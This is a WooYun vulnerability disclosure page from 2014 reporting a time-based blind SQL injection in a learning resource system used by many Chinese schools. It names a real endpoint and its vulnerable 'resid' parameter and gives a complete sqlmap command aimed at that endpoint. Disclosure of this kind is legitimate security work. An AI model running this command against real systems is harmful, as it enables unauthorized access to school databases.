当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083025

漏洞标题:某通用型学习系统存在sql盲注

相关厂商:国家互联网应急中心

漏洞作者: D_in

提交时间:2014-11-13 18:37

修复时间:2015-02-11 18:38

公开时间:2015-02-11 18:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-13: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-21: 细节向第三方安全合作伙伴开放
2015-01-12: 细节向核心白帽子及相关领域专家公开
2015-01-22: 细节向普通白帽子公开
2015-02-01: 细节向实习白帽子公开
2015-02-11: 细节向公众公开

简要描述:

前人描述:BOOM!

详细说明:

前人的一些漏洞: WooYun: 某通用型学习系统前台无限制Getshell(影响数百所学校)
WooYun: 某通用型学习系统两处任意密码修改到后台GetShell(影响数百所学校)
是由中央广播电视大学现代远程教育开发的一套资源中心系统,影响全国所有分中心,几百所以上的学校。貌似主管是国家数字化学习资源中心。几乎涵盖全国所有省
厂商:

http://nerc.edu.cn/FrontEnd/default.html 国家数字化学习资源中心
技术支持是由:中央广播电视大学现代远程教育资源中心


这影响力,简直了

1117404150c03b1adfb814845092a6d65b719abe.jpg


该注入点存在于给课程打分之处

a.png


注入语句

sqlmap -u http://nerc.tjedu.cn/FrontEnd/UserControls/uc_review.ashx --data "txtcontent=&resid=a3d6fba6-5095-4ec3-b205-a9de62254632&type=4&score=3" -p resid --random-agent


参数resid存在时间盲注

漏洞证明:

随便找了四个进行注入
主页

sqlmap -u http://nerc.tjedu.cn/FrontEnd/UserControls/uc_review.ashx --data "txtcontent=&resid=a3d6fba6-5095-4ec3-b205-a9de62254632&type=4&score=3" -p resid --random-agent


1.JPG


天津分中心

天津.JPG


广东分中心

广东.JPG


浙江分中心

浙江.JPG


修复方案:

走个大厂商可好

版权声明:转载请注明来源 D_in@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-11-18 12:07

厂商回复:

最新状态:

暂无